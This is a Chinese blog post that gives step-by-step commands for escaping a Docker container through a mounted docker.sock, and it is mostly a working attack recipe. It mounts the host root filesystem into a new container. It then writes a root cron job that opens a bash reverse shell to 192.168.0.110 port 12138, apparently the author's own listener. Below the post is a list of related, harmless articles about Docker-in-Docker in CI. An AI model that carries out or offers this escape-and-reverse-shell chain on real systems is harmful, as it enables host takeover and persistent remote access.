关于docker in docker的利用

最新推荐文章于 2024-05-24 15:15:08 发布
最新推荐文章于 2024-05-24 15:15:08 发布
阅读量3.4k 收藏
点赞数
分类专栏: 笔记 文章标签: 安全 容器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44882633/article/details/124158324
版权

首先判断是否为docker环境,是否存在docker.sock文件,以及判断docker命令是否能够使用

来打印主机信息
docker -H unix:///host/var/run/docker.sock info

反弹shell的环境下无法进入容器终端,无法使用-it进入容器内部
启动一个新的容器,虚拟机根目录挂载到容器test目录下 
docker -H unix:///host/var/run/docker.sock run -v /:/test ubuntu

在这里插入图片描述

可以直接对容器使用docker exec 指定对容器进行操作
docker exec 259b325 ls /test

在这里插入图片描述

但是在使用echo命令时会报错
docker exec 259b325 echo "* * * * * bash -i >& /dev/tcp/192.168.0.101/12138 0>&1" >> /test/var/spool/cron/root

在这里插入图片描述

解决办法

使用-c 命令  将整条命令通过-c传给sh即可
docker exec 259b325 sh -c 'echo "* * * * * bash -i >& /dev/tcp/192.168.0.110/12138 0>&1" >> /test/var/spool/cron/root'

在这里插入图片描述
查看定时任务发现成功写入并且反弹shell
在这里插入图片描述

闰土不刺猹
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Docker In Docker
jiayu的博客
04-17 947
也就是说,容器内实际并未运行 docker server,但是能够通过宿主机执行docker任务,从而实现轻量级 docker in docker。在docker容器内启动一个docker daemon,对外提供服务,每个运行中的容器,都是一个进程,这个进程都托管在docker daemon中,优点在于镜像和容器都在一个隔离的环境,保持宿主机的环境。否则,建议使用第一种方法。docker dind方式有所不同,所有的docker操作真正在容器内部进行,包括创建的容器、拉取的镜像都保留在容器内部。
docker in docker(docker里边跑docker)
热门推荐
AggressionStorm的博客
08-23 34万+
文章目录docker run in docker一、背景二、原理:移花接木具体操作三、延伸:操作远程主机 docker run in docker 原文地址 一、背景 Docker技术目前在DevOps中被广泛使用,我们需要将测试或者构建的代码和自动化脚本打包成Docker镜像,然后部署在各运行环境中。比如:在 jenkins 容器内运行 docker 命令执行构建镜像 而在CI/CD中,我...
Docker in Docker 原理与实战
2301_79262050的博客
05-24 450
随着容器化技术的普及,Docker 作为一种主流的容器管理工具,已被广泛应用于开发、测试及生产环境中。Docker 的灵活性和便捷性使得它成为 DevOps 流程中不可或缺的一部分。然而,在一些复杂的应用场景中,我们可能需要在一个 Docker 容器内运行另一个 Docker 容器,这就是所谓的 "Docker in Docker" (DinD)。本文将详细探讨 Docker in Docker 的原理、实现方式及实战应用。
docker in docker
github_38730134的博客
06-28 818
在做CI流水线时,需要在流水线中使用docker完成应用镜像打包。无论你的CI流水线是在jenkins中运行,还是在gitlab runner中运行,只要你的jenkins或gitlab runner是通过docker容器运行,都面临着docker in docker问题没有办法在一个docker运行的容器中再安装一个docker。但官方提供了docker:dind镜像,提供docker daemon服务。docker:1.12.6镜像则提供了docker客户端。
Docker in Docker原理与实战
小透明的博客
04-03 1124
Docker in Docker(简称DinD)是一种在Docker容器内部运行Docker的技术。它允许我们在一个Docker容器中嵌套运行另一个Docker容器,这种结构可以简化和隔离开发环境,同时为持续集成和部署流程提供便利。本文将介绍Docker in Docker的原理,并通过实战演示其使用方法。
dind(docker in docker)镜像-使用Docker学习Docker
西京刀客
04-28 5973
您是否曾经注意到,一半的容器管理命令看起来像进程管理操作,而另一半则看起来像文件管理操作?
RocketMQ-DockerCompose
12-27
这表明项目是关于如何利用Docker Compose来管理和部署RocketMQ的实例,对于熟悉这些技术的开发者来说,这是一个非常实用的资源。 总的来说,"RocketMQ-DockerCompose"项目结合了RocketMQ的高效消息处理能力和Docker...
docker安装及问题分析
01-04
in container: OCI runtime exec failed...",这表明在尝试执行命令于容器内部时遇到了问题。 首先,我们需要理解这个问题的根源。在 Docker 的实现中,`ContainerExecStart` 函数用于在容器中启动一个进程,它...
shell脚本监控docker容器和supervisor 运行情况
最新发布
06-19
Shell脚本可以利用Docker CLI(命令行接口)来获取和操作容器。例如,`docker ps`命令用于列出所有正在运行的容器,而`docker logs`则可以查看容器的日志输出。编写一个简单的脚本,定时执行这些命令,并通过grep、...
linux下利用Docker安装mysql的步骤
01-19
作为一个测试人员,在学习的过程中,可能经常需要去在linux下安装一些软件,有的软件通过...接下来为大家演示一下,如何通过docker快速安装一个mysql实例用于学习: 1、首先,搭建docker环境 2、下载mysql镜像,启动镜
docker-in-docker
02-10
Docker中运行CouchDB 内容 选择Docker映像的版本 IMAGE=couchdb TAG=3.1.1 设定容器名称 NAME=couchdb 拉泊坞窗图片 docker pull $IMAGE : $TAG 配置CouchDB .env文件的内容。 COUCHDB_USER=user COUCHDB_PASSWORD=secretpassword 设置本地数据目录 LOCAL_DATA_DIR= ` pwd ` /data 运行CouchDB docker run --rm -d --net host --name $NAME --env-file .env \ -v " $LOCAL_DATA_DIR :/opt/couchdb/data " $IMAGE : $TAG 检查容器 docker inspect $NAME 杀死容器 docker kill $
docker in docker 的一种轻量级实现方法——docker 嵌套技术
shida's blog
04-04 2万+
一、  背景介绍          有时候,我们需要在容器内执行 docker 命令,比如:在 jenkins 容器内运行 docker 命令执行构建镜像          直接在 docker 容器内嵌套安装 docker 未免太过臃肿          更好的办法是:容器内仅部署 docker 命令行工具(作为客户端),实际执行交由宿主机内的 docker-engine(服务器)二、  实现示...
dind(docker in docker)学习
IT老吴的博客
08-30 1万+
docker in docker 说白了,就是在docker容器内启动一个docker daemon,对外提供服务。 优点在于: 镜像和容器都在一个隔离的环境,保持操作者的干净环境。 想到了再补充 :) 一:低版本启动及访问 启动1.12.6-dind docker run --privileged -d --name mydocker docker:1.12.6-dind 在其他容器访问 d...
docker in docker使用方式
IT
08-25 3225
挂载主机docker文件 方式1:挂载主机上的docker.sock以及docker二进制文件 docker run -it \ -v /var/run/docker.sock:/var/run/docker.sock \ -v $(which docker):/usr/bin/docker \ centos docker version 方式2:挂载主机docker.sock并在容器中安装docker客户端 docker run -it \ -v /var/run/docker.sock
Docker in Docker
云原生,DevOps,Kubernetes
11-13 915
场景:jenkins slave运行在基于openshift或k8s的容器中,构建过程需要build 应用程序的docker image并push到docker 仓库,此时就需要docker命令。 安装docker命令比较简单,但是运行docker build 命令需要启动docker服务。 docker in docker 基本上有两种实现方式。 一是挂载/var/run/docker.so...
工作日志——Docker in Docker
xts_huangxin的博客
05-25 2947
前段时间在研究Jenkins Docker插件时了解到了Docker in Docker(下文简称dind)相关知识,特与大家分享。
docker实践 docker in pra
09-07
Docker是一个开源平台,用于在容器化环境中运行应用程序。它可以将应用程序及其依赖项打包在一个独立的、可移植的容器中,以实现跨平台的部署。 在实践中,Docker可以带来诸多好处。首先,它提供了隔离性,每个容器都是相互隔离的,互不干扰,因此可以在同一主机上运行多个不同的应用程序。这大大简化了部署和管理的复杂性,提高了资源利用率。 其次,Docker还具有轻量级和快速启动的优势。由于容器只包含必要的组件,因此它们比虚拟机更小、更快。同时,容器可以在几秒钟内启动和停止,而不需要像传统的虚拟机那样花费较长的启动时间。 另外,Docker还具有可移植性和可扩展性。容器可以在不同的环境中运行,而不需要对应用程序进行修改。这使得开发人员可以在开发环境、测试环境和生产环境中保持一致。此外,Docker还支持自动化部署和水平扩展,使应用程序可以根据需要快速部署和伸缩。 最后,Docker还提供了丰富的生态系统和工具。例如,它可以与持续集成和持续部署工具集成,实现自动化的构建、测试和部署流程。此外,Docker还有大量的镜像仓库和容器编排工具,使得应用程序的管理变得更加简单和灵活。 总结来说,Docker的实践可以带来隔离性、轻量级、快速启动、可移植性和可扩展性等好处。它不仅可以提高开发和运维效率,还可以极大地简化应用程序的部署和管理过程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值